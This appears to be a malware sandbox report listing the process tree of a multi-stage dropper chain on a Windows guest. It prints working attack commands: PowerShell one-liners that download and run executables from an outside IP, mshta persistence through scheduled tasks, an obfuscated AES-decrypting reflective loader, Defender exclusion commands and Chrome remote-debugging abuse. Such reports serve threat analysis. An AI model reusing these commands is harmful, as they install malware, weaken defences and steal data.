PID 3500 wrote to memory of 4484 3500 cmd.exe 109 PID 3500 wrote to memory of 4484 3500 cmd.exe 109 PID 4484 wrote to memory of 1700 4484 cmd.exe 110 PID 4484 wrote to memory of 1700 4484 cmd.exe 110 PID 4484 wrote to memory of 1700 4484 cmd.exe 110 PID 4648 wrote to memory of 3644 4648 skotes.exe 111 PID 4648 wrote to memory of 3644 4648 skotes.exe 111 PID 4648 wrote to memory of 3644 4648 skotes.exe 111 PID 3644 wrote to memory of 5116 3644 bb18e0ec2c.exe 112 PID 3644 wrote to memory of 5116 3644 bb18e0ec2c.exe 112 PID 3644 wrote to memory of 5116 3644 bb18e0ec2c.exe 112 PID 3644 wrote to memory of 5116 3644 bb18e0ec2c.exe 112 PID 3644 wrote to memory of 5116 3644 bb18e0ec2c.exe 112 PID 3644 wrote to memory of 5116 3644 bb18e0ec2c.exe 112 PID 3644 wrote to memory of 5116 3644 bb18e0ec2c.exe 112 PID 3644 wrote to memory of 5116 3644 bb18e0ec2c.exe 112 PID 3644 wrote to memory of 5116 3644 bb18e0ec2c.exe 112 PID 3500 wrote to memory of 4288 3500 cmd.exe 116 PID 3500 wrote to memory of 4288 3500 cmd.exe 116 PID 3500 wrote to memory of 4288 3500 cmd.exe 116 PID 4288 wrote to memory of 4368 4288 cmd.exe 117 PID 4288 wrote to memory of 4368 4288 cmd.exe 117 PID 4288 wrote to memory of 4368 4288 cmd.exe 117 PID 3500 wrote to memory of 844 3500 cmd.exe 118 PID 3500 wrote to memory of 844 3500 cmd.exe 118 PID 3500 wrote to memory of 844 3500 cmd.exe 118 PID 844 wrote to memory of 676 844 cmd.exe 119
Processes
-
C:\Users\Admin\AppData\Local\Temp\4585d37c6262323774089a03884fd2848c8213bcdbe3ee1d3f2a0fde4ad9f070.exe"C:\Users\Admin\AppData\Local\Temp\4585d37c6262323774089a03884fd2848c8213bcdbe3ee1d3f2a0fde4ad9f070.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T0B39.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T0B39.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1E00D7.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1E00D7.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Users\Admin\AppData\Local\Temp\1075142001\801cdea59f.exe"C:\Users\Admin\AppData\Local\Temp\1075142001\801cdea59f.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn TlToamacLu3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\e3C4vfkK2.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn TlToamacLu3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\e3C4vfkK2.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:844
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\e3C4vfkK2.hta6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:824 -
C:\Users\Admin\AppData\Local\Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE"C:\Users\Admin\AppData\Local\Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE"8⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1075143021\am_no.cmd" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1075143021\am_no.cmd" any_word6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:676
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "Sgc6uma1Xa0" /tr "mshta \"C:\Temp\HxE5msDJc.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3424
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\HxE5msDJc.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:60 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:848 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3884
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1075204001\bb18e0ec2c.exe"C:\Users\Admin\AppData\Local\Temp\1075204001\bb18e0ec2c.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Users\Admin\AppData\Local\Temp\1075204001\bb18e0ec2c.exe"C:\Users\Admin\AppData\Local\Temp\1075204001\bb18e0ec2c.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 9606⤵
- Program crash
PID:4124
-
-
-
C:\Users\Admin\AppData\Local\Temp\1075205001\0817201e9c.exe"C:\Users\Admin\AppData\Local\Temp\1075205001\0817201e9c.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2344 -
C:\Users\Admin\AppData\Local\Temp\1075205001\0817201e9c.exe"C:\Users\Admin\AppData\Local\Temp\1075205001\0817201e9c.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1800
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 9486⤵
- Program crash
PID:3644
-
-
-
C:\Users\Admin\AppData\Local\Temp\1075206001\7933a0043c.exe"C:\Users\Admin\AppData\Local\Temp\1075206001\7933a0043c.exe"5⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2132
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1075208041\tYliuwV.ps1"5⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:400 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"6⤵
- System Location Discovery: System Language Discovery
PID:2408 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "7⤵
- System Location Discovery: System Language Discovery
PID:4512
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe7⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1075209001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1075209001\Bjkm5hE.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3236 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"6⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3816 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffb7c10cc40,0x7ffb7c10cc4c,0x7ffb7c10cc587⤵PID:4644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=1920 /prefetch:27⤵PID:2396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1576,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2224 /prefetch:37⤵PID:1680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2308,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2512 /prefetch:87⤵PID:4896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3240 /prefetch:17⤵
- Uses browser remote debugging
PID:744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3348,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3336 /prefetch:17⤵
- Uses browser remote debugging
PID:4724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3704,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4560 /prefetch:17⤵
- Uses browser remote debugging
PID:5004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4800 /prefetch:87⤵PID:4156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4804,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4836 /prefetch:87⤵PID:4748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4856,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4864 /prefetch:87⤵PID:1552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4996,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4884 /prefetch:87⤵PID:1652
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1075210001\WveK4j1.exe"C:\Users\Admin\AppData\Local\Temp\1075210001\WveK4j1.exe"5⤵
- Executes dropped EXE
PID:4924 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:2788
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:2280
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:3616
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:1364
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:3064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:4640
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:1440
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:4596
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:1044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:2316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:4568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:3568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:5092
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\EKZAL'"6⤵PID:2344
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\EKZAL'"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"6⤵PID:3600
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3384
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2l1630.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2l1630.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1648 -
C:\Users\Admin\AppData\Local\Temp\IGR1OJ915UF3M9FHB51EY026C3LI.exe"C:\Users\Admin\AppData\Local\Temp\IGR1OJ915UF3M9FHB51EY026C3LI.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1564
-
-
C:\Users\Admin\AppData\Local\Temp\NC2E7H8VOLSLIOIB7YY8BGE7QSLF9E5.exe"C:\Users\Admin\AppData\Local\Temp\NC2E7H8VOLSLIOIB7YY8BGE7QSLF9E5.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2036
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3G42h.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3G42h.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2856
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjJEOEIxRDQtMEQ5Ri00MjUyLTlDQzYtNzA4OEM4RkM5NUVGfSIgdXNlcmlkPSJ7ODMzQjkyRjgtODMwQi00RkIzLTgxQ0UtMzc5MUE2QTJDMjcwfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7NEY0Qjc1MkItRkUyMi00OTYwLUI5M0YtQjNGNTg5QTkxOEM2fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIzIiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDY0MzMiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxODc1OTU2NTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI0OTU2NTQ1ODM1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:2956
-
